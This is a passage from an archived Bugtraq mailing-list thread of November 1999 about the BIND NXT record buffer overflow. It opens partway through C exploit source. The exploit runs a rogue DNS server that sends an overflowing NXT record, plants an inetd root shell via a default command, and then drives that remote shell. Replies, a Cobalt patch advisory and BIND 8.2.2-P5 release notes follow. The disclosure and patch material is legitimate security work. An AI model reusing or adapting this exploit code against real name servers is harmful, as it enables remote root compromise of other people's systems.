(i=0;i<20;i++) *b++=archlist[arch].ret; } else /*SPARC*/ { memset(a,0x0,11000); b=(unsigned long*)(a+4438); for (i=0;i<1500;i++) *b++=htonl(0xac15a16e); c=(char *)b; for (i=0;i<archlist[arch].codesize;i++) *c++=archlist[arch].code[i]; if (command) strcpy(c, command); else strcpy(c, "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" \ >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob "); b=(unsigned long*)(a+4166); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i5 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o0 - significant *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o6 - significant *b++=htonl(archlist[arch].ret); //o7 - retaddr } } int form_response(HEADER *packet, char *buf) { char query[512]; int qtype; HEADER *dnsh; char *p; char *walker; memset(buf,0,sizeof(buf)); dnsh = (HEADER *) buf; dnsh->id = packet->id; dnsh->qr=1; dnsh->aa=1; dnsh->qdcount = htons(1); dnsh->ancount = htons(1); dnsh->arcount = htons(1); dnsh->rcode = 0; walker=(char*)(dnsh+1); p=dnssprintflabel(query, (char *)packet, (char*)(packet+1)); query[strlen(query) - 1] = 0; qtype=*((unsigned short *)p); printf("%s type=%d\n",query, ntohs(qtype)); /* first, the query */ walker=dnsaddlabel(walker, query); PUTSHORT(ntohs(qtype), walker); //PUTSHORT(htons(T_PTR), walker); PUTSHORT(1,walker); /* then, our answer */ /* query IN A 1.2.3.4 */ walker=dnsaddlabel(walker, query); PUTSHORT(T_A, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); PUTSHORT(4, walker); sprintf(walker,"%c%c%c%c",1,2,3,4); walker+=4; /* finally, we make named do something more interesting */ walker=dnsaddlabel(walker, query); PUTSHORT(T_NXT, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); /* the length of one label and our arbitrary data */ PUTSHORT(archlist[arch].length+7, walker); PUTSHORT(6, walker); sprintf(walker,"admadm"); walker+=6; PUTSHORT(0, walker); make_overflow(walker); walker+=archlist[arch].length; PUTSHORT(0, walker); return walker-buf; } #define max(x,y) ((x)>(y)?(x):(y)) int proxyloop(int s) { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; sleep(1); printf("Entering proxyloop..\n"); strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(s, snd, strlen(snd)); for (;;) { FD_SET(fileno(stdin), &rset); FD_SET(s, &rset); maxfd = max(fileno(stdin), s) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd) - 2, stdin); write(s, snd, strlen(snd)); } if (FD_ISSET(s, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(s, rcv, sizeof(rcv))) == 0) exit(0); if (n < 0) { return -3; } fputs(rcv, stdout); } } return 0; } int main(int argc, char **argv) { int s, fromlen, res, sl, s2; struct sockaddr_in sa, from, to; char buf[16384]; char sendbuf[16384]; unsigned short ts; int i; if (argc<2) { fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]); fprintf(stderr,"Available architectures:\n"); i=-1; while(archlist[++i].id) fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name); exit(1); } arch=atoi(argv[1])-1; if (argc==3) command=argv[2]; if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1) { perror("socket"); exit(1); } bzero(&sa, sizeof sa); sa.sin_family=AF_INET; sa.sin_addr.s_addr=INADDR_ANY; sa.sin_port=htons(53); if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1) { perror("bind"); exit(1); } do { fromlen=sizeof(from); if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from, &fromlen)) == -1) { perror("recvfrom"); exit(1); } printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr), ntohs(from.sin_port)); sl=form_response((HEADER *)buf,sendbuf); /* now lets connect to the nameserver */ bzero(&to, sizeof(to)); to.sin_family=AF_INET; to.sin_addr=from.sin_addr; to.sin_port=htons(53); if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1) { perror("socket"); exit(1); } if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1) { perror("connect"); exit(1); } ts=htons(sl); write(s2,&ts,2); write(s2,sendbuf,sl); if (archlist[arch].safe>1) close(s2); } while (archlist[arch].safe>1); /* infinite loop for sparc */ proxyloop(s2); exit(1); } (4482098) ------------------------------------------ 4482126 1999-11-12 18:54 /33 rader/ Postmaster Mottagare: Bugtraq (import) <8489> Ärende: Re: your mail ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: BUGTRAQ@SECURITYFOCUS.COM X-Authentication-Warning: spiral.gw.tislabs.com: bwelling owned process doin -bs X-Sender: bwelling@spiral.gw.tislabs.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: <Pine.LNX.4.10.9911111415130.18963-100000@spiral.gw.tislabs.com> Date: Thu, 11 Nov 1999 14:39:18 -0500 Reply-To: Brian Wellington <bwelling@TISLABS.COM> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Brian Wellington <bwelling@TISLABS.COM> X-To: BUGTRAQ@SECURITYFOCUS.COM To: BUGTRAQ@SECURITYFOCUS.COM In-Reply-To: <199911110238.DAA24292@sofuku.monster.org> On Thu, 11 Nov 1999, Anonymous wrote: > Ooh, those pesky NXT records. Like I process those every day. > Fascinating read in RFC 2535, but suppose I don't have any NXT > records in my own zones, under what circumstances will my DNS server > commit the sin of "the processing of NXT records"? In other words, > are all of us vulnerable (even caching-only name servers if so, I > imagine!), or only people with NXT records? This makes a big difference! Caching-only servers are also vulnerable. The NXT record is no different that any other DNS record in this case. If someone is able to make your server fetch a maliciously-constructed NXT record, it will cause problems. A query to a caching server will force the server to send a recursive query, which makes the caching server vulnerable. Brian (4482126) ------------------------------------------(Ombruten) 4484693 1999-11-14 05:15 /51 rader/ Postmaster Mottagare: Bugtraq (import) <8517> Ärende: Re: BIND bugs of the month ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com Message-ID: <19991113011424.6999.qmail@cr.yp.to> Date: Sat, 13 Nov 1999 01:14:24 -0000 Reply-To: "D. J. Bernstein" <djb@CR.YP.TO> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: "D. J. Bernstein" <djb@CR.YP.TO> X-To: bugtraq@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM A sniffing attacker can easily forge responses to your DNS requests. He can steal your outgoing mail, for example, and intercept your ``secure'' web transactions. This is obviously a problem. We know how to solve this problem with cryptographic techniques. DNSSEC has InterNIC digitally sign all DNS records, usually through a chain of intermediate authorities. Attackers can't forge the signatures. Of course, this system still allows InterNIC to steal your outgoing mail, and intercept your ``secure'' web transactions. We know how to solve this problem too. The solution is simpler and faster than DNSSEC, though it only works for long domain names: use cryptographic signature key hashes as domain names. But all this cryptographic work accomplishes _nothing_ if the servers are subject to buffer overflows! An attacker doesn't have to bother guessing or sniffing query times and IDs, and forging DNS responses, if he can simply take over the DNS server. This NXT buffer overflow isn't part of some old code that Paul Vixie inherited from careless graduate students. It's new code. It's part of BIND's DNSSEC implementation. I don't find the irony amusing. Obviously ISC's auditing is inadequate. Does anyone seriously believe that the current BIND code is secure? If it isn't, adding DNSSEC to it doesn't help anybody. Is ISC going to rewrite the client and server in a way that gives us confidence in their security? David R. Conrad writes: > In addition, we recommend running your nameserver as non-root and > chrooted (I know setting this up is non-trivial -- it'll be much, much > easier in BINDv9). ``I wouldn't consider installing named any other way,'' I told Vixie in September 1996. He didn't respond. Of course, DNSSEC is equally useless either way; the only question is whether an attacker can also take over the rest of the machine. ---Dan (4484693) ------------------------------------------(Ombruten) 4484727 1999-11-14 05:54 /56 rader/ Postmaster Mottagare: Bugtraq (import) <8520> Ärende: [ Cobalt ] Security Advisory - Bind ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com X-Accept-Language: en MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <382CBA03.4DCB65CF@cobaltnet.com> Date: Fri, 12 Nov 1999 17:08:19 -0800 Reply-To: Jeff Bilicki <jeffb@COBALTNET.COM> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Jeff Bilicki <jeffb@COBALTNET.COM> X-To: BugTraQ <bugtraq@securityfocus.com> To: BUGTRAQ@SECURITYFOCUS.COM Cobalt Networks -- Security Advisory -- 11.12.1999 Problem: A bug in the processing of NXT records can theoretically allow an attacker to gain access to the system running the DNS server at whatever privilege level the DNS server runs at. The full description can be found at http://www.isc.org/products/BIND/bind-security-19991108.html Relevant products and architectures Product Architecture Vulnerable to NXT Qube1 MIPS no Qube2 MIPS no RaQ1 MIPS no RaQ2 MIPS no RaQ3 x86 yes RPMS: ftp://ftp.cobaltnet.com/pub/experimental/security/rpms/bind-8.2.2_P3-C2.i386.rpm ftp://ftp.cobaltnet.com/pub/experimental/security/rpms/bind-devel-8.2.2_P3-C2.i386.rpm ftp://ftp.cobaltnet.com/pub/experimental/security/rpms/bind-utils-8.2.2_P3-C2.i386.rpm SRPMS: ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/bind-8.2.2_P3-C2.src.rpm MD5 sum Package Name ------------------------------------------------------------- 1cf09350860f4880423a85d27e976383 bind-8.2.2_P3-C2.i386.rpm ec5fba0ecd6a664dcbb4e1c9439ad7a5 bind-devel-8.2.2_P3-C2.i386.rpm 85fcfb6d05e8e2e6b8a64641037a106f bind-utils-8.2.2_P3-C2.i386.rpm You can verify each rpm using the following command: rpm --checksig [package] To install, use the following command, while logged in as root: rpm -U [package] The package file format (pkg) for this fix is currently in testing, and will be available in the near future. Jeff Bilicki Cobalt Networks (4484727) ------------------------------------------(Ombruten) 4487262 1999-11-14 22:44 /127 rader/ Postmaster Mottagare: Bugtraq (import) <8525> Ärende: BIND 8.2.2-P5 release announcement ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <19991114034841.0268A1FF5A@lists.securityfocus.com> Date: Sat, 13 Nov 1999 22:42:36 -0500 Reply-To: Roger FajmanSender: Bugtraq List From: Roger Fajman X-To: BUGTRAQ@SECURITYFOCUS.COM To: BUGTRAQ@SECURITYFOCUS.COM FYI for those discussing bind 8.2.2-P4, Patch 5 was just released... To: bind-announce@isc.org Subject: BIND 8.2.2-P5 release announcement Date: Fri, 12 Nov 1999 23:20:25 -0800 From: Paul A Vixie -----BEGIN PGP SIGNED MESSAGE----- Some highlights vs. BIND 8.2.2: Bug in named-xfer (from patchlevel 4). Portability to IPv6 versions of FreeBSD, OpenBSD, NetBSD. Portability improvements (A/UX, AIX, IRIX, NetBSD, SCO, MPE/IX, NT). "also-notify" option could cause memory allocation errors. IXFR improvements (though client-side is still disabled). Contributed software upgraded (including TIS's "dns_signer"). Several latent denial-of-service bugs fixed (from audits, not abuse). New "make noesw" top-level target for removing encumbered components. Distribution files are: ftp://ftp.isc.org/isc/bind/src/8.2.2-P5/bind-src.tar.gz ftp://ftp.isc.org/isc/bind/src/8.2.2-P5/bind-doc.tar.gz ftp://ftp.isc.org/isc/bind/src/8.2.2-P5/bind-contrib.tar.gz PGP signature files are: ftp://ftp.isc.org/isc/bind/src/8.2.2-P5/bind-src.tar.gz.asc ftp://ftp.isc.org/isc/bind/src/8.2.2-P5/bind-doc.tar.gz.asc ftp://ftp.isc.org/isc/bind/src/8.2.2-P5/bind-contrib.tar.gz.asc MD5 checksums are: 414ddb56d706b5bec1d5135344f3ccb0 bind-contrib.tar.gz 32367327e613dd1cc75176b04185a773 bind-contrib.tar.gz.asc 32f60488e6c2c5ef583c96742f0c8f07 bind-doc.tar.gz bb8898ae5a6b67b8586f144c842d8bac bind-doc.tar.gz.asc fd8ab0befccc3546531904eac12cf6f7 bind-src.tar.gz be7ca74d96db0858daa69a4ad6275058 bind-src.tar.gz.asc top of CHANGES says: --- 8.2.2-P5 released --- 895. [port] minor NT build and documentation improvements. 894. [bug] incorrect "key" statements in named.conf weren't handled properly. --- 8.2.2-P4 released --- 893. [bug] DNSSEC logic in bin/host broke -t any 892. [bug] multiple SOA on AXFR bug --- 8.2.2-P3 released --- 891. [bug] options { also-notify { ... }; }; resulted in wrong pointer being memput with the wrong size on reload. 890. [port] A/UX portability improved. 889. [port] added IPv6 portability for OpenBSD, NetBSD, FreeBSD. --- 8.2.2-P2 released (internal release) --- 888. [support] add default: all tag to top src/Makefile so that "make" will work properly in some OS'. 887. [bug] "dig ... axfr" was printing spurious "TSIG ok" msgs. 886. [support] top-level Makefile now included in all tarballs. 885. [support] IXFR improvements. 884. [bug] some deprecated NXT RR forms weren't ignored properly. 883. [support] "host" command can now try to verify dnssec signatures. 882. [contrib] dns_signer/ had some last minute problems (by author). 881. [bug] possible sprintf() overflow prevented. 880. [support] minor tweak to bin/dig/dig.c TSIG code to clarify whether res_nsend or res_nsendsigned is being used. 879. [support] add "noesw" target to top-level Makefile (for PL1). 878. [port] aix4 HAS_INET6_STRUCTS was not being set based on the existance of _IN6_ADDR_STRUCT. 877. [port] freebsd + KAME need a different Makefile.set see INSTALL notes. 876. [port] IPv6 probe for MPE/IX, NetBSD. 875. [bug] bad NAPTR RRs could be loaded from zone files. 874. [port] update irix_patch in irix port. 873. [port] add SRC/tools to sco's make [std]links. --- 8.2.2-REL released --- ... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBOC0QX22DN4pRurLtAQEZ2gQAjbn+8aMtlU4BcO+a4RHZOxcMAPe0vF1G 2NDmWz2HYm6hNLGF6KBMWiVo0K2cLQ2bqAOnFkjQkIcpzkPXpGZaB6A0smi9qWzY U28sd0M9xCem733s3r5DXdf2USZNzi5QY2f7Ozzu2gRLks7V+4NMDfBQGt91xwod Wf7Oh0yCtgQ= =sExL -----END PGP SIGNATURE----- (4487262) ------------------------------------------(Ombruten)